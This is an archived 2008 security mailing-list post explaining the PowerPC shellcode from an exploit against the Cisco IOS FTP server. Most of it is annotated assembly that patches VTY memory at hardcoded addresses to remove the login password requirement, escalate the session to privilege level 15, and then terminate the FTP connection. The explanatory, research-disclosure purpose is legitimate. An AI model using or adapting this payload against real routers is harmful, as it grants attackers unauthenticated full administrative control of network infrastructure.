Cisco IOS shellcode explanation

2008-07-30T00:00:00
ID SECURITYVULNS:DOC:20244
Type securityvulns
Reporter Securityvulns
Modified 2008-07-30T00:00:00

Description

Hi,

Lots of people have been asking for details about the slightly unorthodox shellcode I used within the IOS FTP exploit, so here goes:

.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure .equ terminate, 0x80e4086c

lis 4,vty_info@ha la 4,vty_info@l(4)
xor 8,8,8 //Clear r8 lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove //the requirement to enter a password subi 8,8,1 //Set r8 to be 0xffffffff addi 7,7,233 //Add second offset in two steps to //avoid nulls in the shellcode stw 8,1226(7) //Write 0xffffffff to second offset to //priv escalate to level 15 //(technically this should be 0xff100000 //but 0xffffffff works and is more efficient) mr 3,8 //Use 0xffffffff as a parameter //to pass to terminate() lis 4,terminate@ha la 4,terminate@l(4)
mtctr 4 bctr //terminate "this process" //(current connection to the FTP server)

Cheers,

Andy